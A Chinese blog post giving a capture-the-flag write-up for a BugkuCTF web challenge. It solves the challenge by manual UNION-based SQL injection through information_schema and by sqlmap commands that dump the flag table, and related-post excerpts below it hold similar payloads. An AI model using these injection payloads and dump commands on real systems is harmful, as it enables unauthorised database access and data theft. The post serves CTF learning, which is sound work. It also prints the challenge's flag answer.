BugkuCTF-web-成绩单 WP

最新推荐文章于 2021-08-31 15:02:34 发布
最新推荐文章于 2021-08-31 15:02:34 发布
阅读量1.6k 收藏 13
点赞数 4
分类专栏: CTF做题记录
会下雪的晴天
本文链接:https://blog.csdn.net/weixin_43578492/article/details/95602526
版权

最基本的SQL注入

题目描述

解题传送门:http://123.206.87.240:8002/chengjidan/
在这里插入图片描述

解题思路

查看源码可以知道,name为id,且为post传参
在这里插入图片描述
用火狐的hackbar,查几个试试,试了一下,只有三个数据
在这里插入图片描述
那么,id后面加个'看看
在这里插入图片描述
报错了,哪加个'#呢,又恢复正常了
在这里插入图片描述
SQL注入,稳了,两种解法

  • 方法一、手工注入

在手工注入之前要先知道一些小知识点,拿小本本记下来
1、
MySql在5.0版本后新增一个叫information_schema的虚拟数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权 限等。利用这个,我们可以获取表名,列名等
2、
查询中用到的group_concat()函数是要把查询的内容联合到一起方便查看的,这样就不需要limit 0,1一个一个判断了
ok,科普完毕

先查个字段,由于有三个数据,就直接先用4吧order by 4#
返回正常
返回正常,order by 5#
在这里插入图片描述
没有回显,那么可以确定,字段就是4个了,接下来,暴库名
id=-1' union select 1,2,3,4//把id变为-1是因为如果id有回显的话,我们查询的东西就不能能显示了,所以要换一个id没有东西的数值
在这里插入图片描述
知道他们出现的位置了,接下来才是真的暴库,哈哈
id=-1' union select 1,database(),user(),version()#
得到数据库名skctf_flag
在这里插入图片描述
然后暴表名(固定格式)
id=-1' union select 1,group_concat(table_name),user(),version() from information_schema.tables where table_schema=database()#
得到两个表名fl4g,sc
在这里插入图片描述
接下来就是暴列名了
id=-1' union select 1,group_concat(column_name),user(),version() from information_schema.columns where table_name='fl4g'#
取得列名为skctf_flag
ps:表明单引号要用英文'',不加也可以,但表名要用十六进制
在这里插入图片描述
最后就是查询数据了
id=-1' union select 1,skctf_flag,user(),version() from fl4g#
得到FLAGBUGKU{Sql_INJECT0N_4813drd8hz4}
在这里插入图片描述
----------------------------------------------------------------------------------------------------------

  • 方法二、sqlmap跑
    对话框输入1,然后抓包,并点击Copy to file保存,我保存到了E盘下
    在这里插入图片描述
    指定文件名及类型,保存为txt即可
    在这里插入图片描述
    然后掏出sqlmap开始暴库
    sqlmap.py -r E:\a.txt -p id --dbs或者
    sqlmap.py -r "E:\a.txt" -p id --current-db
    -r -->打开指定文件
    -p -->指定注入参数
    –current-db(两个-) 或 --dbs–>暴库名
    在这里插入图片描述
    暴表名 sqlmap.py -r E:\a.txt -p id -D skctf_flag --tables
    -D -->指定数据库
    –tables(两个-) -->列出当前数据库的表
    在这里插入图片描述
    暴列名,很明显,flag在fl4g的表中
    sqlmap.py -r E:\a.txt -p id -D skctf_flag -T fl4g --column
    -T -->指定表名
    –column(两个-)–>列出当前表的列
    在这里插入图片描述
    最后下载数据
    sqlmap.py -r E:\a.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump
    -C -->指定列名
    –dump(两个-)–>下载数据
    在这里插入图片描述

END

会下雪的晴天
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BugkuCTF-web-成绩单 writeup
kuller_Yan的博客
03-26 425
记一次简单的SQL注入 题目传送门,点击即走 首先分析题目:进入题目网页就可以看到这个 遇到表单,当然要填一填,看看有什么变化。于是我根据题目提示输入1。仔细观察可以发现输入1,并且返回后,出现了龙龙龙的成绩单以及四份数据。 于是打开hackbar,post提交 正常返回,加 ’ 测试一下 啥也不是,再加个 # 又正常了。 那么基本可以认定是SQL注入无疑了。 两种解题方法: 1:手...
BugkuCTF成绩单web
s0il的博客
04-02 764
题目描述: 让人看上去就是SQL注入。 提交一下,出现三列属性,flag就应该在这里面: 手动注入: 在表单中输入1或者1#或者1--或者1++等返回正常,输入1'返回异常 库名、表名、字段名的获取: 联合查询 id=-1' union select 1,2,3,4# 之后返回: 或者执行-1' orde...
bugku成绩单
qq_43677324的博客
03-09 921
bugku成绩单 详细解析 1,我们首先分别输入1,2,3, 均有输出 我们输入1’ 没有回响 因此我们可以判断存在sql注入 2.我们分别输入 1' order by 1# 1' order by 2# 1' order by 3# 1' order by 4# 均有回响 但是当我们使用 1' order by 5# 时,没有回响 因此我们可以根据此判断字段数为4 3, 之后就是最精彩的地...
Bugku:成绩单
Newbiek的博客
04-02 946
首先,正常输入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
bugku---成绩单
LuckySec
11-16 510
题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入 首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...
BugKu——成绩单
D-R0s1的博客
10-08 889
  sql注入在CTF类竞赛中占着很大的比重,在做BugKu的题目的过程中恰好遇到了一个没有任何过滤,直接注入的题目,因为没有过滤,只是单纯的考察sql注入,所以步骤比较固定,语句也比较简单 1.首先,爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1,2,3都有回显,然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...
CTF平台题库writeup(二)--BugKuCTF-WEB(部分)
渗透、攻防、CTF、编程
06-26 4191
web2 flag在源码的注释里 计算器 改一下text文本框的最大输入位数>1即可 web基础$_GET GET方式传参即可 web基础$_POST post方式传参即可 矛盾 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } 这题要求传参num不能是数字,而且num=1,一开始没有什么思路,认为是弱类型的绕过,传了true进去,发现无效,问
BugkuCTF-PWN题pwn7-repeater详细讲解多解法
am_03的博客
08-31 4211
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2289
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
BugkuCTF-WEB进阶
Alita_lxz的博客
11-10 375
BugkuCTF-WEB进阶-第1题到第11题
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 2123
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
bugku-成绩单
weixin_42430107的博客
07-16 188
转载:https://www.cnblogs.com/0yst3r-2046/p/10756453.html mysql注释符有三种: 1、#... 2、"-- ",注意--后面有一个空格 3、/*...*/ 本题过滤了“-- ”可以采用#号 本道题倒在了“加上单引号’则数据为空,但是再加上注释符#就又正常了 ” 不知道为啥会加上单引号为空加上注释符后正常。 mysql函数: current_user() , user(), system_user() : 返回当前用户 databas.
BUGKU-----成绩单
weixin_43803070的博客
07-04 200
放暑假的第三天,开启暑假的刷题之路,怎么说呢,学了三个月的安全,还是需要打一下基础,所以就来bugku刷题咯。 拿道题,一看就是sql注入啦。啥都不说直接上payload。 ** 基础知识: ** 在做题之前必须要说一下基础知识: mysql中有一个数据库information里面有三个表,每个表中都有字段。如上图 1' //1'报错说明存在注入啦。 2. 1'--+ //我们加上注释之...
bugku 成绩单详解
qq_35811830的博客
01-26 1254
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
bugku-writeup-web-成绩查询
dark的博客
06-16 238
bugku-web成绩查询解题思路记录。” 题目:
Bugku--学生成绩查询
Golderant的博客
01-17 3003
首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空,加个注释符发现依旧可以正常输出。 尝试获取列数,因为已经输出名字和3科分数,所以就猜4和5,得知查询结果中有4列。 尝试直接联合查询,这里要记得把前面查询为空。== 根据数据库去查表名 找到fl4g表,下一步,找列名 最后一步,知道表名知道列名啦,去获取数据吧~~ 关于这个题呢,因为表fl
BUGKU--web--成绩单解析
爱吃小敏饭团子的博客
08-24 208
BUGKU 没有任何过滤 非常友好 题目地址 :http://123.206.87.240:8002/chengjidan/ 按照题目提示输入123分别的到不同的人的成绩单 4以后出现空白,由此可以推测有4列 基本到这里就是典型的sql注入题了 打开BP firefox浏览器调节代理 BP抓包发现是POST传值 关闭代理,关闭BP 上sqlmap注入 python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --f
Bugku CTF-web17 成绩单
weixin_44023403的博客
05-15 344
Bugku CTF-web17成绩单前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
bugku-web-成绩单
a3uRa的一个窝
08-29 724
非常简单的sql注入 1 1’ 1‘# id=1' order by 1# id=1' order by 2# id=1' order by 3# id=1' order by 4# id=1' order by 5# id=' union select 1,2,3,4# id=' union select 1,2,3,database()# id=' union select 1,2,3,...
WordPress wp-config.php配置详解:数据库、安全密钥与字符集
"这篇文档详细解释了WordPress的配置文件wp-config.php,涵盖了数据库连接设置、字符集与整理、以及安全密匙的配置等关键信息,旨在帮助用户更好地理解和定制WordPress站点。" 在WordPress中,`wp-config.php`是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值